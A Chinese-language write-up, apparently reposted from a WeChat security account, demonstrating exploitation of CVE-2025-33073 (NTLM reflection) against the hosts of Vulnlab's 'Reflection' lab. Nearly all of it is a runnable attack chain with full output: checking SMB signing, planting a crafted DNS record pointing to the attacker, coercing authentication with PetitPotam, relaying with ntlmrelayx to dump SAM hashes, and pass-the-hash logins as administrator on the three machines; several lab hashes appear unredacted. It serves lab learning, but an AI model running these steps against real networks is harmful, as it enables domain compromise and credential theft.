这篇文章仅演示了该攻击过程。关于“反射”攻击链的详细说明,我已经创建了一个,您可以在这里找到:https://seriotonctf.github.io/Reflection-Vulnlab/
Synacktiv 最近发布了一篇关于 CVE-2025-33073(NTLM 反射攻击)的博客文章。在本文中,我将演示如何在 Vulnlab 的“反射”链中利用此漏洞。如需深入分析,请参阅Synacktiv 的原始博客文章。
状况
此次攻击要想成功,必须满足以下条件:
-
必须在目标上禁用 SMB 签名
-
攻击者必须拥有创建 DNS 记录的权限
攻击
首先,我们需要检查目标是否禁用了 SMB 签名
➜ nxcsmbtargets.txtSMB10.10.163.39445WS01[*]Windows10 / Server2019Build19041x64 (name:WS01) (domain:reflection.vl) (signing:False) (SMBv1:False)SMB10.10.163.37445DC01[*]WindowsServer2022Build20348x64 (name:DC01) (domain:reflection.vl) (signing:False) (SMBv1:False)SMB10.10.163.38445MS01[*]WindowsServer2022Build20348x64 (name:MS01) (domain:reflection.vl) (signing:False) (SMBv1:False)Runningnxcagainst3targets ━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━ 100%0:00:00
signing:False etexec 确认这三台目标机器均未强制执行 SMB 签名( ),因此它们可能容易受到此攻击
注册 DNS 记录
我们需要注册一个新的 DNS 记录,在本例中localhost1UWhRCAAAAAAAAAAAAAAAAAAAAAAAAAAAAwbEAYBAAAA,让它指向我们的 IP 地址
➜ dnstool.py -u 'reflection.vlabbie.smith' -p '<REDACTED>'10.10.163.37 -a add -d 10.8.0.210 -r 'localhost1UWhRCAAAAAAAAAAAAAAAAAAAAAAAAAAAAwbEAYBAAAA'[-] Connecting to host...[-] Binding to host[+] Bind OK[-] Adding new record[+] LDAP operation completed successfully
或者,我们可以使用我们想要利用的机器的主机名创建一个新的 DNS 记录,例如,DC01
➜ dnstool.py -u 'reflection.vlabbie.smith' -p '<REDACTED>'10.10.163.37 -a add -d 10.8.0.210 -r 'DC011UWhRCAAAAAAAAAAAAAAAAAAAAAAAAAAAAwbEAYBAAAA'[-] Connecting to host...[-] Binding to host[+] Bind OK[-] Adding new record[+] LDAP operation completed successfully
让我们验证一下 DNS 记录是否已创建并指向攻击者的 IP 地址
➜ dnstool.py -u'reflection.vlabbie.smith' -p'<REDACTED>'10.10.163.37 -a query -d 10.8.0.210 -r 'localhost1UWhRCAAAAAAAAAAAAAAAAAAAAAAAAAAAAwbEAYBAAAA'[-] Connecting to host...[-] Binding to host[+] Bind OK[+] Found record localhost1UWhRCAAAAAAAAAAAAAAAAAAAAAAAAAAAAwbEAYBAAAADC=localhost1UWhRCAAAAAAAAAAAAAAAAAAAAAAAAAAAAwbEAYBAAAA,DC=reflection.vl,CN=MicrosoftDNS,DC=DomainDnsZones,DC=reflection,DC=vl[+] Record entry: - Type: 1 (A) (Serial:90) - Address:10.8.0.210
或者,我们可以使用dig命令
➜ diglocalhost1UWhRCAAAAAAAAAAAAAAAAAAAAAAAAAAAAwbEAYBAAAA.reflection.vl @DC01.reflection.vl; <<>> DiG 9.18.30-0ubuntu0.24.04.2-Ubuntu <<>> localhost1UWhRCAAAAAAAAAAAAAAAAAAAAAAAAAAAAwbEAYBAAAA.reflection.vl @DC01.reflection.vl;; globaloptions: +cmd;; Gotanswer:;; ->>HEADER<<-opcode: QUERY, status: NOERROR, id: 20625;; flags: qraardra; QUERY: 1, ANSWER: 1, AUTHORITY: 0, ADDITIONAL: 1;; OPTPSEUDOSECTION:; EDNS: version: 0, flags:; udp: 4000;; QUESTIONSECTION:;localhost1UWhRCAAAAAAAAAAAAAAAAAAAAAAAAAAAAwbEAYBAAAA.reflection.vl. INA;; ANSWERSECTION:localhost1UWhRCAAAAAAAAAAAAAAAAAAAAAAAAAAAAwbEAYBAAAA.reflection.vl. 180 INA 10.8.0.210;; Querytime: 63 msec;; SERVER: 10.10.163.37#53(DC01.reflection.vl) (UDP);; WHEN: SunJun 15 15:28:07CET 2025;; MSGSIZErcvd: 112
➜ digDC011UWhRCAAAAAAAAAAAAAAAAAAAAAAAAAAAAwbEAYBAAAA.reflection.vl @DC01.reflection.vl; <<>> DiG 9.18.30-0ubuntu0.24.04.2-Ubuntu <<>> DC011UWhRCAAAAAAAAAAAAAAAAAAAAAAAAAAAAwbEAYBAAAA.reflection.vl @DC01.reflection.vl;; globaloptions: +cmd;; Gotanswer:;; ->>HEADER<<-opcode: QUERY, status: NOERROR, id: 13727;; flags: qraardra; QUERY: 1, ANSWER: 1, AUTHORITY: 0, ADDITIONAL: 1;; OPTPSEUDOSECTION:; EDNS: version: 0, flags:; udp: 4000;; QUESTIONSECTION:;DC011UWhRCAAAAAAAAAAAAAAAAAAAAAAAAAAAAwbEAYBAAAA.reflection.vl. INA;; ANSWERSECTION:DC011UWhRCAAAAAAAAAAAAAAAAAAAAAAAAAAAAwbEAYBAAAA.reflection.vl. 180 INA 10.8.0.210;; Querytime: 62 msec;; SERVER: 10.10.163.37#53(DC01.reflection.vl) (UDP);; WHEN: SunJun 15 15:34:06CET 2025;; MSGSIZErcvd: 156
强迫
现在,我们只需要强制对之前创建的 DNS 记录进行身份验证
➜ PetitPotam.py -d reflection.vl -u abbie.smith -p '<REDACTED>' localhost1UWhRCAAAAAAAAAAAAAAAAAAAAAAAAAAAAwbEAYBAAAA DC01.reflection.vl ___ _ _ _ ___ _ | _ ___ | |_ (_) | |_ | _ ___ | |_ __ _ _ __ | _/ / -_) | _| | | | _| | _/ / _ | _| / _` | | ' _|_|_ ___| ___| _|_|_ ___| _|_|_ ___/ ___| __,_| |_|_|_| _| """ |_|"""""|_|"""""|_|"""""|_|"""""|_| """ |_|"""""|_|"""""|_|"""""|_|"""""|"`-0-0-'"`-0-0-'"`-0-0-'"`-0-0-'"`-0-0-'"`-0-0-'"`-0-0-'"`-0-0-'"`-0-0-'"`-0-0-' PoC to elicit machine account authentication via some MS-EFSRPC functions by topotam (@topotam77) Inspired by @tifkin_ & @elad_shamir previous work on MS-RPRNTrying pipe lsarpc[-] Connecting to ncacn_np:DC01.reflection.vl[PIPElsarpc][+] Connected![+] Binding to c681d488-d850-11d0-8c52-00c04fd90f7e[+] Successfully bound![-] Sending EfsRpcOpenFileRaw![-] Got RPC_ACCESS_DENIED!! EfsRpcOpenFileRaw is probably PATCHED![+] OK! Using unpatched function![-] Sending EfsRpcEncryptFileSrv![+] Got expected ERROR_BAD_NETPATH exception!![+] Attack worked!
我们还可以使用coerce_plusNetexec 的模块
➜ nxc smb DC01.reflection.vl -u abbie.smith -p'<REDACTED>' -M coerce_plus -o METHOD=Petitpotam LISTENER=localhost1UWhRCAAAAAAAAAAAAAAAAAAAAAAAAAAAAwbEAYBAAAASMB 10.10.201.85445 DC01 [*] Windows Server 2022 Build 20348 x64 (name:DC01) (domain:reflection.vl) (signing:False) (SMBv1:False)SMB 10.10.201.85445 DC01 [+] reflection.vlabbie.smith:<REDACTED>COERCE_PLUS 10.10.201.85445 DC01 VULNERABLE, PetitPotamCOERCE_PLUS 10.10.201.85445 DC01 Exploit Success, lsarpcEfsRpcAddUsersToFile
攻击奏效
如你所见,攻击成功了,我们能够执行 SAM 转储,因为 SYSTEM 令牌用于身份验证
➜ ntlmrelayx.py -t "smb://DC01.reflection.vl" -smb2supportImpacket v0.13.0.dev0+20250415.195618.c384b5fb - Copyright Fortra, LLC and its affiliated companies[*] Protocol Client IMAP loaded..[*] Protocol Client IMAPS loaded..[*] Protocol Client LDAP loaded..[*] Protocol Client LDAPS loaded..[*] Protocol Client SMTP loaded..[*] Protocol Client RPC loaded..[*] Protocol Client HTTP loaded..[*] Protocol Client HTTPS loaded..[*] Protocol Client DCSYNC loaded..[*] Protocol Client SMB loaded..[*] Protocol Client MSSQL loaded..[*] Running in relay mode to single host[*] Setting up SMB Server on port 445[*] Setting up HTTP Server on port 80[*] Setting up WCF Server on port 9389[*] Setting up RAW Server on port 6666[*] Multirelay disabled[*] Servers started, waiting for connections[*] SMBD-Thread-5 (process_request_thread): Received connection from10.10.163.37, attacking target smb://DC01.reflection.vl[*] Authenticating against smb://DC01.reflection.vl as / SUCCEED[*] SMBD-Thread-7 (process_request_thread): Received connection from10.10.163.37, attacking target smb://DC01.reflection.vl[*] Service RemoteRegistry isin stopped state[*] Authenticating against smb://DC01.reflection.vl as / SUCCEED[*] Starting service RemoteRegistry[*] Target system bootKey: 0xfcb176024780bc221b4c7b3f35e16dfd[*] Target system bootKey: 0xfcb176024780bc221b4c7b3f35e16dfd[*] Dumping local SAM hashes (uid:rid:lmhash:nthash)[*] Dumping local SAM hashes (uid:rid:lmhash:nthash)Administrator:500:aad3b435b51404eeaad3b435b51404ee:<REDACTED>:::Administrator:500:aad3b435b51404eeaad3b435b51404ee:<REDACTED>:::Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::DefaultAccount:503:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::DefaultAccount:503:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::[*] Done dumping SAM hashes for host: dc01.reflection.vl[*] Done dumping SAM hashes for host: dc01.reflection.vl[*] Stopping service RemoteRegistry
➜ nxcsmbDC01.reflection.vl-u administrator -H <REDACTED>SMB 10.10.163.37 445 DC01[*]WindowsServer 2022 Build 20348 x64 (name:DC01) (domain:reflection.vl) (signing:False) (SMBv1:False)SMB 10.10.163.37 445 DC01[+]reflection.vladministrator:<REDACTED> (Pwn3d!)
以同样的方式,我们可以瞄准MS01并WS01
MS01
➜ PetitPotam.py -d reflection.vl -u abbie.smith -p '<REDACTED>' localhost1UWhRCAAAAAAAAAAAAAAAAAAAAAAAAAAAAwbEAYBAAAA ms01.reflection.vl ___ _ _ _ ___ _ | _ ___ | |_ (_) | |_ | _ ___ | |_ __ _ _ __ | _/ / -_) | _| | | | _| | _/ / _ | _| / _` | | ' _|_|_ ___| ___| _|_|_ ___| _|_|_ ___/ ___| __,_| |_|_|_| _| """ |_|"""""|_|"""""|_|"""""|_|"""""|_| """ |_|"""""|_|"""""|_|"""""|_|"""""|"`-0-0-'"`-0-0-'"`-0-0-'"`-0-0-'"`-0-0-'"`-0-0-'"`-0-0-'"`-0-0-'"`-0-0-'"`-0-0-' PoC to elicit machine account authentication via some MS-EFSRPC functions by topotam (@topotam77) Inspired by @tifkin_ & @elad_shamir previous work on MS-RPRNTrying pipe lsarpc[-] Connecting to ncacn_np:ms01.reflection.vl[PIPElsarpc][+] Connected![+] Binding to c681d488-d850-11d0-8c52-00c04fd90f7e[+] Successfully bound![-] Sending EfsRpcOpenFileRaw![-] Got RPC_ACCESS_DENIED!! EfsRpcOpenFileRaw is probably PATCHED![+] OK! Using unpatched function![-] Sending EfsRpcEncryptFileSrv![+] Got expected ERROR_BAD_NETPATH exception!![+] Attack worked!
➜ ntlmrelayx.py -t "smb://MS01.reflection.vl" -smb2supportImpacket v0.13.0.dev0+20250415.195618.c384b5fb - Copyright Fortra, LLC and its affiliated companies[*] Protocol Client IMAPS loaded..[*] Protocol Client IMAP loaded..[*] Protocol Client LDAPS loaded..[*] Protocol Client LDAP loaded..[*] Protocol Client SMTP loaded..[*] Protocol Client RPC loaded..[*] Protocol Client HTTPS loaded..[*] Protocol Client HTTP loaded..[*] Protocol Client DCSYNC loaded..[*] Protocol Client SMB loaded..[*] Protocol Client MSSQL loaded..[*] Running in relay mode to single host[*] Setting up SMB Server on port 445[*] Setting up HTTP Server on port 80[*] Setting up WCF Server on port 9389[*] Setting up RAW Server on port 6666[*] Multirelay disabled[*] Servers started, waiting for connections[*] SMBD-Thread-5 (process_request_thread): Received connection from10.10.163.38, attacking target smb://MS01.reflection.vl[*] Authenticating against smb://MS01.reflection.vl as / SUCCEED[*] SMBD-Thread-7 (process_request_thread): Received connection from10.10.163.38, attacking target smb://MS01.reflection.vl[*] Service RemoteRegistry isin stopped state[*] Authenticating against smb://MS01.reflection.vl as / SUCCEED[*] Starting service RemoteRegistry[*] Target system bootKey: 0xf0093534e5f21601f5f509571855eeee[*] Target system bootKey: 0xf0093534e5f21601f5f509571855eeee[*] Dumping local SAM hashes (uid:rid:lmhash:nthash)[*] Dumping local SAM hashes (uid:rid:lmhash:nthash)Administrator:500:aad3b435b51404eeaad3b435b51404ee:<REDACTED>:::Administrator:500:aad3b435b51404eeaad3b435b51404ee:<REDACTED>:::Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::DefaultAccount:503:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::DefaultAccount:503:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::WDAGUtilityAccount:504:aad3b435b51404eeaad3b435b51404ee:bb5d8648678f590b8b3051e24a985345:::WDAGUtilityAccount:504:aad3b435b51404eeaad3b435b51404ee:bb5d8648678f590b8b3051e24a985345:::labadm:1000:aad3b435b51404eeaad3b435b51404ee:2a50f9a04b270a24fcd474092ebd9c8e:::[*] Done dumping SAM hashes for host: ms01.reflection.vllabadm:1000:aad3b435b51404eeaad3b435b51404ee:2a50f9a04b270a24fcd474092ebd9c8e:::[*] Done dumping SAM hashes for host: ms01.reflection.vl[*] Stopping service RemoteRegistry
➜ nxcsmbMS01.reflection.vl-uadministrator-H <REDACTED> --local-authSMB 10.10.163.38 445 MS01[*]WindowsServer 2022 Build 20348 x64 (name:MS01) (domain:MS01) (signing:False) (SMBv1:False)SMB 10.10.163.38 445 MS01[+]MS01administrator:<REDACTED> (Pwn3d!)
WS01
➜ PetitPotam.py -d reflection.vl -u abbie.smith -p '<REDACTED>' localhost1UWhRCAAAAAAAAAAAAAAAAAAAAAAAAAAAAwbEAYBAAAA WS01.reflection.vl ___ _ _ _ ___ _ | _ ___ | |_ (_) | |_ | _ ___ | |_ __ _ _ __ | _/ / -_) | _| | | | _| | _/ / _ | _| / _` | | ' _|_|_ ___| ___| _|_|_ ___| _|_|_ ___/ ___| __,_| |_|_|_| _| """ |_|"""""|_|"""""|_|"""""|_|"""""|_| """ |_|"""""|_|"""""|_|"""""|_|"""""|"`-0-0-'"`-0-0-'"`-0-0-'"`-0-0-'"`-0-0-'"`-0-0-'"`-0-0-'"`-0-0-'"`-0-0-'"`-0-0-' PoC to elicit machine account authentication via some MS-EFSRPC functions by topotam (@topotam77) Inspired by @tifkin_ & @elad_shamir previous work on MS-RPRNTrying pipe lsarpc[-] Connecting to ncacn_np:WS01.reflection.vl[PIPElsarpc][+] Connected![+] Binding to c681d488-d850-11d0-8c52-00c04fd90f7e[+] Successfully bound![-] Sending EfsRpcOpenFileRaw![-] Got RPC_ACCESS_DENIED!! EfsRpcOpenFileRaw is probably PATCHED![+] OK! Using unpatched function![-] Sending EfsRpcEncryptFileSrv![+] Got expected ERROR_BAD_NETPATH exception!![+] Attack worked!
➜ ntlmrelayx.py -t "smb://WS01.reflection.vl" -smb2supportImpacket v0.13.0.dev0+20250415.195618.c384b5fb - Copyright Fortra, LLC and its affiliated companies[*] Protocol Client IMAPS loaded..[*] Protocol Client IMAP loaded..[*] Protocol Client LDAPS loaded..[*] Protocol Client LDAP loaded..[*] Protocol Client SMTP loaded..[*] Protocol Client RPC loaded..[*] Protocol Client HTTPS loaded..[*] Protocol Client HTTP loaded..[*] Protocol Client DCSYNC loaded..[*] Protocol Client SMB loaded..[*] Protocol Client MSSQL loaded..[*] Running in relay mode to single host[*] Setting up SMB Server on port 445[*] Setting up HTTP Server on port 80[*] Setting up WCF Server on port 9389[*] Setting up RAW Server on port 6666[*] Multirelay disabled[*] Servers started, waiting for connections[*] SMBD-Thread-5 (process_request_thread): Received connection from10.10.163.39, attacking target smb://WS01.reflection.vl[*] Authenticating against smb://WS01.reflection.vl as / SUCCEED[*] SMBD-Thread-7 (process_request_thread): Received connection from10.10.163.39, attacking target smb://WS01.reflection.vl[*] Service RemoteRegistry isin stopped state[*] Authenticating against smb://WS01.reflection.vl as / SUCCEED[*] Service RemoteRegistry is disabled, enabling it[*] Starting service RemoteRegistry[*] Target system bootKey: 0x7ed33ac4a19a5ea7635d402e58c0055f[*] Target system bootKey: 0x7ed33ac4a19a5ea7635d402e58c0055f[*] Dumping local SAM hashes (uid:rid:lmhash:nthash)[*] Dumping local SAM hashes (uid:rid:lmhash:nthash)Administrator:500:aad3b435b51404eeaad3b435b51404ee:<REDACTED>:::Administrator:500:aad3b435b51404eeaad3b435b51404ee:<REDACTED>:::Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::DefaultAccount:503:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::DefaultAccount:503:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::WDAGUtilityAccount:504:aad3b435b51404eeaad3b435b51404ee:236728438532f0f1a57360173bda0575:::WDAGUtilityAccount:504:aad3b435b51404eeaad3b435b51404ee:236728438532f0f1a57360173bda0575:::labadm:1001:aad3b435b51404eeaad3b435b51404ee:<REDACTED>:::[*] Done dumping SAM hashes for host: ws01.reflection.vllabadm:1001:aad3b435b51404eeaad3b435b51404ee:<REDACTED>:::[*] Done dumping SAM hashes for host: ws01.reflection.vl[*] Stopping service RemoteRegistry[*] Restoring the disabled state for service RemoteRegistry
➜ nxc smb WS01.reflection.vl -u administrator -H <REDACTED> --local-authSMB 10.10.163.39445 WS01 [*] Windows 10 / Server 2019 Build 19041 x64 (name:WS01) (domain:WS01) (signing:False) (SMBv1:False)SMB 10.10.163.39445 WS01 [+] WS01administrator:<REDACTED> (Pwn3d!)
资源
https://www.synacktiv.com/en/publications/ntlm-reflection-is-dead-long-live-ntlm-reflection-an-in-depth-analysis-of-cve-2025
https://blog.redteam-pentesting.de/2025/reflective-kerberos-relay-attack/
https://msrc.microsoft.com/update-guide/vulnerability/CVE-2025-33073
https://github.com/mverschu/CVE-2025-33073
原文始发于微信公众号(Ots安全):使用 NTLM 反射进行 Pwning 反射
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论